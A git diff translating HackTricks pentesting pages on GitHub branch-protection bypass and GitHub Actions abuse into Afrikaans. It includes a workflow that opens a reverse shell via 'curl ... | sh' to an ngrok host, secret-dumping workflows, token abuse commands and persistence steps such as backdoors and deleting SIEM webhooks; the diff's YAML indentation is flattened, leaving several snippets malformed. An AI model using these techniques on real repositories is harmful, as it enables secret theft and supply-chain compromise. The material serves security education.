+- _Let wel vir hierdie en vir die Kode-eienaars beperking dat 'n gebruiker gewoonlik nie sy eie PR's kan goedkeur nie, maar as jy dit kan, kan jy dit misbruik om jou PR's te aanvaar._
+- **Verwerp goedkeuringe wanneer nuwe verbintenisse gestuur word**: As dit nie ingestel is nie, kan jy wettige kode indien, wag totdat iemand dit goedkeur, en kwaadwillige kode plaas en dit in die beskermde tak saamvoeg.
+- **Vereis hersienings van Kode-eienaars**: As dit geaktiveer is en jy is 'n Kode-eienaar, kan jy 'n **Github Aksie laat jou PR skep en dit dan self goedkeur**.
+- Wanneer 'n **CODEOWNER-lêer verkeerd geconfigureer is**, kla Github nie, maar dit gebruik dit nie. Daarom, as dit verkeerd geconfigureer is, is **Kode-eienaars beskerming nie van toepassing nie.**
+- **Laat gespesifiseerde akteurs om takverlangings te omseil**: As jy een van hierdie akteurs is, kan jy takverlangings omseil.
+- **Sluit administrateurs in**: As dit nie ingestel is nie en jy is 'n admin van die repo, kan jy hierdie takbeskermings omseil.
+- **PR Hijacking**: Jy mag in staat wees om **die PR van iemand anders te wysig** deur kwaadwillige kode by te voeg, die resulterende PR self goed te keur en alles saam te voeg.
+- **Verwyder Takbeskermings**: As jy 'n **admin van die repo is, kan jy die beskermings deaktiveer**, jou PR saamvoeg en die beskermings terugstel.
+- **Omseiling van drukbeskermings**: As 'n repo **slegs sekere gebruikers toelaat** om druk (kode saam te voeg) in takke te stuur (die takbeskerming mag al die takke beskerm deur die wildcard `*` te spesifiseer).
+- As jy **skryftoegang oor die repo het, maar jy mag nie kode druk nie** weens die takbeskerming, kan jy steeds **'n nuwe tak skep** en binne dit 'n **github aksie skep wat geaktiveer word wanneer kode gestuur word**. Aangesien die **takbeskerming nie die tak sal beskerm totdat dit geskep is nie**, sal hierdie eerste kode druk na die tak die **github aksie** uitvoer.
 
-## Bypass Environments Protections
+## Omseiling van Omgewingsbeskermings
 
-For an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).
+Vir 'n inleiding oor [**Github Omgewing kyk na die basiese inligting**](basic-github-information.md#git-environments).
 
-In case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).
-
-Note, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.
+In die geval dat 'n omgewing **van al die takke toegang kan verkry**, is dit **nie beskerm nie** en jy kan maklik toegang verkry tot die geheime binne die omgewing. Let daarop dat jy repos mag vind waar **al die takke beskerm is** (deur hul name te spesifiseer of deur `*` te gebruik) in daardie scenario, **vind 'n tak waar jy kode kan druk** en jy kan die geheime **uitvoer** deur 'n nuwe github aksie te skep (of een te wysig).
 
+Let daarop dat jy die randgeval mag vind waar **al die takke beskerm is** (deur wildcard `*`) en dit is gespesifiseer **wie kode na die takke kan druk** (_jy kan dit in die takbeskerming spesifiseer_) en **jou gebruiker is nie toegelaat nie**. Jy kan steeds 'n pasgemaakte github aksie uitvoer omdat jy 'n tak kan skep en die druktrigger oor homself kan gebruik. Die **takbeskerming laat die druk na 'n nuwe tak toe, so die github aksie sal geaktiveer word**.
 ```yaml
 push: # Run it when a push is made to a branch
-  branches:
-    - current_branch_name #Use '**' to run when a push is made to any branch
+branches:
+- current_branch_name #Use '**' to run when a push is made to any branch
 ```
+Let wel dat **na die skepping** van die tak die **takbeskerming op die nuwe tak sal van toepassing wees** en jy dit nie sal kan wysig nie, maar teen daardie tyd sal jy reeds die geheime afgelaai het.
 
-Note that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.
+## Volharding
 
-## Persistence
+- Genereer **gebruikertoken**
+- Steel **github tokens** van **geheime**
+- **Verwydering** van werkvloei **resultate** en **takke**
+- Gee **meer regte aan die hele organisasie**
+- Skep **webhooks** om inligting te eksfiltreer
+- Nooi **buitelandse samewerkers**
+- **Verwyder** **webhooks** wat deur die **SIEM** gebruik word
+- Skep/wysig **Github Action** met 'n **terugdeur**
+- Vind **kwulnerbare Github Action vir opdraginjekie** deur **geheime** waarde wysiging
 
-- Generate **user token**
-- Steal **github tokens** from **secrets**
-  - **Deletion** of workflow **results** and **branches**
-- Give **more permissions to all the org**
-- Create **webhooks** to exfiltrate information
-- Invite **outside collaborators**
-- **Remove** **webhooks** used by the **SIEM**
-- Create/modify **Github Action** with a **backdoor**
-- Find **vulnerable Github Action to command injection** via **secret** value modification
+### Imposter Commits - Terugdeur via repo commits
 
-### Imposter Commits - Backdoor via repo commits
-
-In Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.
-
-Like [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
+In Github is dit moontlik om **'n PR na 'n repo van 'n fork te skep**. Selfs al word die PR **nie aanvaar nie**, sal 'n **commit** id binne die oorspronklike repo geskep word vir die fork weergawe van die kode. Daarom **kan 'n aanvaller 'n spesifieke commit van 'n blykbaar legitieme repo wat nie deur die eienaar van die repo geskep is nie, vaspen**.
 
+Soos [**dit**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):
 ```yaml
 name: example
 on: [push]
 jobs:
-  commit:
-    runs-on: ubuntu-latest
-    steps:
-      - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
-      - shell: bash
-        run: |
-          echo 'hello world!'
+commit:
+runs-on: ubuntu-latest
+steps:
+- uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e
+- shell: bash
+run: |
+echo 'hello world!'
 ```
-
-For more info check [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
+Vir meer inligting, kyk na [https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd](https://www.chainguard.dev/unchained/what-the-fork-imposter-commits-in-github-actions-and-ci-cd)
 
 {{#include ../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
index c5ce0467b..50e3f1b2b 100644
--- a/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
+++ b/src/pentesting-ci-cd/github-security/abusing-github-actions/README.md
@@ -1,384 +1,366 @@
-# Abusing Github Actions
+# Misbruik van Github Actions
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-## Basic Information
+## Basiese Inligting
 
-In this page you will find:
+In hierdie bladsy sal jy vind:
 
-- A **summary of all the impacts** of an attacker managing to access a Github Action
-- Different ways to **get access to an action**:
-  - Having **permissions** to create the action
-  - Abusing **pull request** related triggers
-  - Abusing **other external access** techniques
-  - **Pivoting** from an already compromised repo
-- Finally, a section about **post-exploitation techniques to abuse an action from inside** (cause the mentioned impacts)
+- 'n **opsomming van al die impakte** van 'n aanvaller wat daarin slaag om toegang tot 'n Github Action te verkry
+- Verskillende maniere om **toegang tot 'n aksie** te verkry:
+- Om **toestemmings** te hê om die aksie te skep
+- Misbruik van **pull request** verwante triggers
+- Misbruik van **ander eksterne toegang** tegnieke
+- **Pivoting** vanaf 'n reeds gecompromitteerde repo
+- Laastens, 'n afdeling oor **post-exploitatie tegnieke om 'n aksie van binne te misbruik** (om die genoem impakte te veroorsaak)
 
-## Impacts Summary
+## Impakte Opsomming
 
-For an introduction about [**Github Actions check the basic information**](../basic-github-information.md#github-actions).
+Vir 'n inleiding oor [**Github Actions kyk na die basiese inligting**](../basic-github-information.md#github-actions).
 
-If you can **execute arbitrary code in GitHub Actions** within a **repository**, you may be able to:
+As jy **arbitraire kode in GitHub Actions** binne 'n **repository** kan **uitvoer**, mag jy in staat wees om:
 
-- **Steal secrets** mounted to the pipeline and **abuse the pipeline's privileges** to gain unauthorized access to external platforms, such as AWS and GCP.
-- **Compromise deployments** and other **artifacts**.
-  - If the pipeline deploys or stores assets, you could alter the final product, enabling a supply chain attack.
-- **Execute code in custom workers** to abuse computing power and pivot to other systems.
-- **Overwrite repository code**, depending on the permissions associated with the `GITHUB_TOKEN`.
+- **Geheime** wat aan die pyplyn gekoppel is te **steel** en die **privileges van die pyplyn** te misbruik om ongeoorloofde toegang tot eksterne platforms, soos AWS en GCP, te verkry.
+- **Ontplooiings** en ander **artefakte** te **kompromitteer**.
+- As die pyplyn bates ontplooi of stoor, kan jy die finale produk verander, wat 'n voorsieningskettingaanval moontlik maak.
+- **Kode in pasgemaakte werkers** uit te voer om rekenaarkrag te misbruik en na ander stelsels te pivot.
+- **Repository kode te oorskryf**, afhangende van die toestemmings wat met die `GITHUB_TOKEN` geassosieer is.
 
 ## GITHUB_TOKEN
 
-This "**secret**" (coming from `${{ secrets.GITHUB_TOKEN }}` and `${{ github.token }}`) is given when the admin enables this option:
+Hierdie "**geheim**" (kom van `${{ secrets.GITHUB_TOKEN }}` en `${{ github.token }}`) word gegee wanneer die admin hierdie opsie aktiveer:
 
 <figure><img src="../../../images/image (86).png" alt=""><figcaption></figcaption></figure>
 
-This token is the same one a **Github Application will use**, so it can access the same endpoints: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
+Hierdie token is dieselfde een wat 'n **Github Toepassing sal gebruik**, sodat dit toegang tot dieselfde eindpunte kan hê: [https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps](https://docs.github.com/en/rest/overview/endpoints-available-for-github-apps)
 
 > [!WARNING]
-> Github should release a [**flow**](https://github.com/github/roadmap/issues/74) that **allows cross-repository** access within GitHub, so a repo can access other internal repos using the `GITHUB_TOKEN`.
+> Github moet 'n [**vloei**](https://github.com/github/roadmap/issues/74) vrystel wat **kruis-repository** toegang binne GitHub toelaat, sodat 'n repo ander interne repos met die `GITHUB_TOKEN` kan benader.
 
-You can see the possible **permissions** of this token in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
+Jy kan die moontlike **toestemmings** van hierdie token sien in: [https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token](https://docs.github.com/en/actions/security-guides/automatic-token-authentication#permissions-for-the-github_token)
 
-Note that the token **expires after the job has completed**.\
-These tokens looks like this: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
+Let daarop dat die token **verval nadat die werk voltooi is**.\
+Hierdie tokens lyk soos volg: `ghs_veaxARUji7EXszBMbhkr4Nz2dYz0sqkeiur7`
 
-Some interesting things you can do with this token:
+Sommige interessante dinge wat jy met hierdie token kan doen:
 
 {{#tabs }}
 {{#tab name="Merge PR" }}
-
 ```bash
 # Merge PR
 curl -X PUT \
-    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/merge \
-    -H "Accept: application/vnd.github.v3+json" \
-    --header "authorization: Bearer $GITHUB_TOKEN" \
-    --header "content-type: application/json" \
-    -d "{\"commit_title\":\"commit_title\"}"
+https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/merge \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header "content-type: application/json" \
+-d "{\"commit_title\":\"commit_title\"}"
 ```
-
 {{#endtab }}
-{{#tab name="Approve PR" }}
-
+{{#tab name="Goedkeur PR" }}
 ```bash
 # Approve a PR
 curl -X POST \
-    https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
-    -H "Accept: application/vnd.github.v3+json" \
-    --header "authorization: Bearer $GITHUB_TOKEN" \
-    --header 'content-type: application/json' \
-    -d '{"event":"APPROVE"}'
+https://api.github.com/repos/<org_name>/<repo_name>/pulls/<pr_number>/reviews \
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+-d '{"event":"APPROVE"}'
 ```
-
 {{#endtab }}
-{{#tab name="Create PR" }}
-
+{{#tab name="Skep PR" }}
 ```bash
 # Create a PR
 curl -X POST \
-  -H "Accept: application/vnd.github.v3+json" \
-  --header "authorization: Bearer $GITHUB_TOKEN" \
-    --header 'content-type: application/json' \
-  https://api.github.com/repos/<org_name>/<repo_name>/pulls \
-  -d '{"head":"<branch_name>","base":"master", "title":"title"}'
+-H "Accept: application/vnd.github.v3+json" \
+--header "authorization: Bearer $GITHUB_TOKEN" \
+--header 'content-type: application/json' \
+https://api.github.com/repos/<org_name>/<repo_name>/pulls \
+-d '{"head":"<branch_name>","base":"master", "title":"title"}'
 ```
-
 {{#endtab }}
 {{#endtabs }}
 
 > [!CAUTION]
-> Note that in several occasions you will be able to find **github user tokens inside Github Actions envs or in the secrets**. These tokens may give you more privileges over the repository and organization.
+> Let daarop dat jy in verskeie gevalle **github gebruikers tokens binne Github Actions omgewings of in die geheime** sal vind. Hierdie tokens kan jou meer voorregte oor die repository en organisasie gee.
 
 <details>
 
-<summary>List secrets in Github Action output</summary>
-
+<summary>lys geheime in Github Action uitvoer</summary>
 ```yaml
 name: list_env
 on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - "**"
-  push: # Run it when a push is made to a branch
-    branches:
-      - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
 jobs:
-  List_env:
-    runs-on: ubuntu-latest
-    steps:
-      - name: List Env
-        # Need to base64 encode or github will change the secret value for "***"
-        run: sh -c 'env | grep "secret_" | base64 -w0'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
-          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+List_env:
+runs-on: ubuntu-latest
+steps:
+- name: List Env
+# Need to base64 encode or github will change the secret value for "***"
+run: sh -c 'env | grep "secret_" | base64 -w0'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 ```
-
 </details>
 
 <details>
 
-<summary>Get reverse shell with secrets</summary>
-
+<summary>Kry omgekeerde skulp met geheime</summary>
 ```yaml
 name: revshell
 on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - "**"
-  push: # Run it when a push is made to a branch
-    branches:
-      - "**"
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- "**"
+push: # Run it when a push is made to a branch
+branches:
+- "**"
 jobs:
-  create_pull_request:
-    runs-on: ubuntu-latest
-    steps:
-      - name: Get Rev Shell
-        run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
-        env:
-          secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
-          secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
+create_pull_request:
+runs-on: ubuntu-latest
+steps:
+- name: Get Rev Shell
+run: sh -c 'curl https://reverse-shell.sh/2.tcp.ngrok.io:15217 | sh'
+env:
+secret_myql_pass: ${{secrets.MYSQL_PASSWORD}}
+secret_postgress_pass: ${{secrets.POSTGRESS_PASSWORDyaml}}
 ```
-
 </details>
 
-It's possible to check the permissions given to a Github Token in other users repositories **checking the logs** of the actions:
+Dit is moontlik om die toestemmings wat aan 'n Github Token gegee is in ander gebruikers se repositories **te kontroleer deur die logs** van die aksies:
 
 <figure><img src="../../../images/image (286).png" alt="" width="269"><figcaption></figcaption></figure>
 
-## Allowed Execution
+## Toegelate Uitvoering
 
 > [!NOTE]
-> This would be the easiest way to compromise Github actions, as this case suppose that you have access to **create a new repo in the organization**, or have **write privileges over a repository**.
+> Dit sou die maklikste manier wees om Github aksies te kompromitteer, aangesien hierdie geval veronderstel dat jy toegang het om **'n nuwe repo in die organisasie te skep**, of **skryfregte oor 'n repository** het.
 >
-> If you are in this scenario you can just check the [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action).
+> As jy in hierdie scenario is, kan jy net die [Post Exploitation techniques](./#post-exploitation-techniques-from-inside-an-action) nagaan.
 
-### Execution from Repo Creation
+### Uitvoering vanaf Repo Skepping
 
-In case members of an organization can **create new repos** and you can execute github actions, you can **create a new repo and steal the secrets set at organization level**.
+In die geval dat lede van 'n organisasie **nuwe repos kan skep** en jy kan github aksies uitvoer, kan jy **'n nuwe repo skep en die geheime wat op organisasievlak gestel is, steel**.
 
-### Execution from a New Branch
+### Uitvoering vanaf 'n Nuwe Tak
 
-If you can **create a new branch in a repository that already contains a Github Action** configured, you can **modify** it, **upload** the content, and then **execute that action from the new branch**. This way you can **exfiltrate repository and organization level secrets** (but you need to know how they are called).
-
-You can make the modified action executable **manually,** when a **PR is created** or when **some code is pushed** (depending on how noisy you want to be):
+As jy **'n nuwe tak in 'n repository kan skep wat reeds 'n Github Action** geconfigureer het, kan jy dit **wysig**, **die inhoud oplaai**, en dan **daardie aksie vanaf die nuwe tak uitvoer**. Op hierdie manier kan jy **repository en organisasievlak geheime** **uitvoer** (maar jy moet weet hoe hulle genoem word).
 
+Jy kan die gewysigde aksie uitvoerbaar maak **handmatig,** wanneer 'n **PR geskep word** of wanneer **enige kode gepush word** (afhangende van hoe luidrugtig jy wil wees):
 ```yaml
 on:
-  workflow_dispatch: # Launch manually
-  pull_request: #Run it when a PR is created to a branch
-    branches:
-      - master
-  push: # Run it when a push is made to a branch
-    branches:
-      - current_branch_name
+workflow_dispatch: # Launch manually
+pull_request: #Run it when a PR is created to a branch
+branches:
+- master
+push: # Run it when a push is made to a branch
+branches:
+- current_branch_name
 # Use '**' instead of a branh name to trigger the action in all the cranches
 ```
-
 ---
 
-## Forked Execution
+## Forked Uitvoering
 
 > [!NOTE]
-> There are different triggers that could allow an attacker to **execute a Github Action of another repository**. If those triggerable actions are poorly configured, an attacker could be able to compromise them.
+> Daar is verskillende triggers wat 'n aanvaller kan toelaat om **'n Github Action van 'n ander repository uit te voer**. As daardie triggerbare aksies swak geconfigureer is, kan 'n aanvaller in staat wees om hulle te kompromitteer.
 
 ### `pull_request`
 
-The workflow trigger **`pull_request`** will execute the workflow every time a pull request is received with some exceptions: by default if it's the **first time** you are **collaborating**, some **maintainer** will need to **approve** the **run** of the workflow:
+Die werksvloei-trigger **`pull_request`** sal die werksvloei elke keer uitvoer wanneer 'n pull request ontvang word met 'n paar uitsonderings: standaard, as dit die **eerste keer** is dat jy **saamwerk**, sal 'n **onderhouer** die **uitvoering** van die werksvloei moet **goedkeur**:
 
 <figure><img src="../../../images/image (184).png" alt=""><figcaption></figcaption></figure>
 
 > [!NOTE]
-> As the **default limitation** is for **first-time** contributors, you could contribute **fixing a valid bug/typo** and then send **other PRs to abuse your new `pull_request` privileges**.
+> Aangesien die **standaard beperking** vir **eerste keer** bydraers is, kan jy **bydra tot die regstelling van 'n geldige fout/typo** en dan **ander PRs stuur om jou nuwe `pull_request` voorregte te misbruik**.
 >
-> **I tested this and it doesn't work**: ~~Another option would be to create an account with the name of someone that contributed to the project and deleted his account.~~
+> **Ek het dit getoets en dit werk nie**: ~~‘n Ander opsie sou wees om 'n rekening te skep met die naam van iemand wat by die projek bygedra het en sy rekening te verwyder.~~
 
-Moreover, by default **prevents write permissions** and **secrets access** to the target repository as mentioned in the [**docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
+Boonop **verhoed dit standaard skryfrechten** en **toegang tot geheime** tot die teikengebruikersrepo soos genoem in die [**dokumentasie**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflows-in-forked-repositories):
 
-> With the exception of `GITHUB_TOKEN`, **secrets are not passed to the runner** when a workflow is triggered from a **forked** repository. The **`GITHUB_TOKEN` has read-only permissions** in pull requests **from forked repositories**.
+> Met die uitsondering van `GITHUB_TOKEN`, **word geheime nie aan die hardloper oorgedra** wanneer 'n werksvloei van 'n **forked** repository geaktiveer word nie. Die **`GITHUB_TOKEN` het slegs leesregte** in pull requests **van forked repositories**.
 
-An attacker could modify the definition of the Github Action in order to execute arbitrary things and append arbitrary actions. However, he won't be able to steal secrets or overwrite the repo because of the mentioned limitations.
+'n Aanvaller kan die definisie van die Github Action wysig om arbitrêre dinge uit te voer en arbitrêre aksies by te voeg. Hy sal egter nie in staat wees om geheime te steel of die repo te oorskryf nie weens die genoem beperkings.
 
 > [!CAUTION]
-> **Yes, if the attacker change in the PR the github action that will be triggered, his Github Action will be the one used and not the one from the origin repo!**
+> **Ja, as die aanvaller die github action in die PR verander wat geaktiveer sal word, sal sy Github Action die een wees wat gebruik word en nie die een van die oorspronklike repo nie!**
 
-As the attacker also controls the code being executed, even if there aren't secrets or write permissions on the `GITHUB_TOKEN` an attacker could for example **upload malicious artifacts**.
+Aangesien die aanvaller ook die kode wat uitgevoer word, beheer, selfs al is daar geen geheime of skryfrechten op die `GITHUB_TOKEN` nie, kan 'n aanvaller byvoorbeeld **kwaadaardige artefakte oplaai**.
 
 ### **`pull_request_target`**
 
-The workflow trigger **`pull_request_target`** have **write permission** to the target repository and **access to secrets** (and doesn't ask for permission).
+Die werksvloei-trigger **`pull_request_target`** het **skryfrechten** tot die teikengebruikersrepo en **toegang tot geheime** (en vra nie vir toestemming nie).
 
-Note that the workflow trigger **`pull_request_target`** **runs in the base context** and not in the one given by the PR (to **not execute untrusted code**). For more info about `pull_request_target` [**check the docs**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
-Moreover, for more info about this specific dangerous use check this [**github blog post**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
+Let daarop dat die werksvloei-trigger **`pull_request_target`** **in die basis konteks** loop en nie in die een gegee deur die PR nie (om **nie onbetroubare kode uit te voer**). Vir meer inligting oor `pull_request_target` [**kyk die dokumentasie**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#pull_request_target).\
+Boonop, vir meer inligting oor hierdie spesifieke gevaarlike gebruik, kyk hierdie [**github blog pos**](https://securitylab.github.com/research/github-actions-preventing-pwn-requests/).
 
-It might look like because the **executed workflow** is the one defined in the **base** and **not in the PR** it's **secure** to use **`pull_request_target`**, but there are a **few cases were it isn't**.
+Dit mag lyk asof die **uitgevoerde werksvloei** die een is wat in die **basis** gedefinieer is en **nie in die PR nie**, dit is **veilig** om **`pull_request_target`** te gebruik, maar daar is 'n **paar gevalle waar dit nie is nie**.
 
-An this one will have **access to secrets**.
+En hierdie een sal **toegang tot geheime** hê.
 
 ### `workflow_run`
 
-The [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger allows to run a workflow from a different one when it's `completed`, `requested` or `in_progress`.
-
-In this example, a workflow is configured to run after the separate "Run Tests" workflow completes:
+Die [**workflow_run**](https://docs.github.com/en/actions/using-workflows/events-that-trigger-workflows#workflow_run) trigger laat toe om 'n werksvloei van 'n ander een uit te voer wanneer dit `voltooi`, `gevraag` of `in_progress` is.
 
+In hierdie voorbeeld is 'n werksvloei geconfigureer om uit te voer nadat die aparte "Toets Hardloop" werksvloei voltooi is:
 ```yaml
 on:
-  workflow_run:
-    workflows: [Run Tests]
-    types:
-      - completed
+workflow_run:
+workflows: [Run Tests]
+types:
+- completed
 ```
+Moreover, according to the docs: Die werksvloei wat deur die `workflow_run` gebeurtenis begin is, kan **toegang tot geheime hê en tokens skryf, selfs al was die vorige werksvloei nie**.
 
-Moreover, according to the docs: The workflow started by the `workflow_run` event is able to **access secrets and write tokens, even if the previous workflow was not**.
-
-This kind of workflow could be attacked if it's **depending** on a **workflow** that can be **triggered** by an external user via **`pull_request`** or **`pull_request_target`**. A couple of vulnerable examples can be [**found this blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)**.** The first one consist on the **`workflow_run`** triggered workflow downloading out the attackers code: `${{ github.event.pull_request.head.sha }}`\
-The second one consist on **passing** an **artifact** from the **untrusted** code to the **`workflow_run`** workflow and using the content of this artifact in a way that makes it **vulnerable to RCE**.
+Hierdie tipe werksvloei kan aangeval word as dit **afhang** van 'n **werksvloei** wat deur 'n eksterne gebruiker via **`pull_request`** of **`pull_request_target`** geaktiveer kan word. 'n Paar kwesbare voorbeelde kan [**hierdie blog**](https://www.legitsecurity.com/blog/github-privilege-escalation-vulnerability)** gevind word.** Die eerste een bestaan uit die **`workflow_run`** geaktiveerde werksvloei wat die aanvallerskode aflaai: `${{ github.event.pull_request.head.sha }}`\
+Die tweede een bestaan uit **die oordrag** van 'n **artefak** van die **onbetroubare** kode na die **`workflow_run`** werksvloei en die gebruik van die inhoud van hierdie artefak op 'n manier wat dit **kwesbaar maak vir RCE**.
 
 ### `workflow_call`
 
 TODO
 
-TODO: Check if when executed from a pull_request the used/downloaded code if the one from the origin or from the forked PR
+TODO: Kontroleer of wanneer dit vanaf 'n pull_request uitgevoer word, die gebruikte/afgelaaide kode die een van die oorsprong of van die geforkte PR is.
 
-## Abusing Forked Execution
+## Misbruik van Geforkte Uitvoering
 
-We have mentioned all the ways an external attacker could manage to make a github workflow to execute, now let's take a look about how this executions, if bad configured, could be abused:
+Ons het al die maniere genoem hoe 'n eksterne aanvaller 'n github werksvloei kan laat uitvoer, kom ons kyk nou na hoe hierdie uitvoerings, as dit sleg geconfigureer is, misbruik kan word:
 
-### Untrusted checkout execution
+### Onbetroubare checkout uitvoering
 
-In the case of **`pull_request`,** the workflow is going to be executed in the **context of the PR** (so it'll execute the **malicious PRs code**), but someone needs to **authorize it first** and it will run with some [limitations](./#pull_request).
+In die geval van **`pull_request`,** sal die werksvloei in die **konsep van die PR** uitgevoer word (so dit sal die **kwesbare PR se kode** uitvoer), maar iemand moet dit **eers goedkeur** en dit sal met 'n paar [beperkings](./#pull_request) loop.
 
-In case of a workflow using **`pull_request_target` or `workflow_run`** that depends on a workflow that can be triggered from **`pull_request_target` or `pull_request`** the code from the original repo will be executed, so the **attacker cannot control the executed code**.
+In die geval van 'n werksvloei wat **`pull_request_target` of `workflow_run`** gebruik wat afhang van 'n werksvloei wat vanaf **`pull_request_target` of `pull_request`** geaktiveer kan word, sal die kode van die oorspronklike repo uitgevoer word, so die **aanvaller kan nie die uitgevoerde kode beheer nie**.
 
 > [!CAUTION]
-> However, if the **action** has an **explicit PR checkou**t that will **get the code from the PR** (and not from base), it will use the attackers controlled code. For example (check line 12 where the PR code is downloaded):
+> egter, as die **aksie** 'n **duidelike PR checkout** het wat **die kode van die PR** sal **kry** (en nie van die basis nie), sal dit die aanvallers beheerde kode gebruik. Byvoorbeeld (kyk na lyn 12 waar die PR kode afgelaai word):
 
-<pre class="language-yaml"><code class="lang-yaml"># INSECURE. Provided as an example only.
+<pre class="language-yaml"><code class="lang-yaml"># ONVEILIG. Slegs as 'n voorbeeld verskaf.
 on:
-  pull_request_target
+pull_request_target
 
 jobs:
-  build:
-    name: Build and test
-    runs-on: ubuntu-latest
-    steps:
+build:
+name: Bou en toets
+runs-on: ubuntu-latest
+steps:
 <strong>    - uses: actions/checkout@v2
 </strong><strong>      with:
 </strong><strong>        ref: ${{ github.event.pull_request.head.sha }}
 </strong>
-    - uses: actions/setup-node@v1
-    - run: |
-        npm install
-        npm build
+- uses: actions/setup-node@v1
+- run: |
+npm install
+npm build
 
-    - uses: completely/fakeaction@v2
-      with:
-        arg1: ${{ secrets.supersecret }}
+- uses: completely/fakeaction@v2
+with:
+arg1: ${{ secrets.supersecret }}
 
-    - uses: fakerepo/comment-on-pr@v1
-      with:
-        message: |
-          Thank you!
+- uses: fakerepo/comment-on-pr@v1
+with:
+message: |
+Dankie!
 </code></pre>
 
-The potentially **untrusted code is being run during `npm install` or `npm build`** as the build scripts and referenced **packages are controlled by the author of the PR**.
+Die potensieel **onbetroubare kode word tydens `npm install` of `npm build`** uitgevoer aangesien die bou skripte en verwysde **pakkette deur die outeur van die PR** beheer word.
 
 > [!WARNING]
-> A github dork to search for vulnerable actions is: `event.pull_request pull_request_target extension:yml` however, there are different ways to configure the jobs to be executed securely even if the action is configured insecurely (like using conditionals about who is the actor generating the PR).
+> 'n github dork om vir kwesbare aksies te soek is: `event.pull_request pull_request_target extension:yml` egter, daar is verskillende maniere om die werksgeleenthede te konfigureer om veilig uitgevoer te word selfs al is die aksie onveilig geconfigureer (soos om voorwaardes te gebruik oor wie die akteur is wat die PR genereer).
 
-### Context Script Injections <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
+### Konteks Skrip Injekties <a href="#understanding-the-risk-of-script-injections" id="understanding-the-risk-of-script-injections"></a>
 
-Note that there are certain [**github contexts**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) whose values are **controlled** by the **user** creating the PR. If the github action is using that **data to execute anything**, it could lead to **arbitrary code execution:**
+Let daarop dat daar sekere [**github kontekste**](https://docs.github.com/en/actions/reference/context-and-expression-syntax-for-github-actions#github-context) is waarvan die waardes **beheer** word deur die **gebruiker** wat die PR skep. As die github aksie daardie **data gebruik om enigiets uit te voer**, kan dit lei tot **arbitraire kode uitvoering:**
 
 {{#ref}}
 gh-actions-context-script-injections.md
 {{#endref}}
 
-### **GITHUB_ENV Script Injection** <a href="#what-is-usdgithub_env" id="what-is-usdgithub_env"></a>
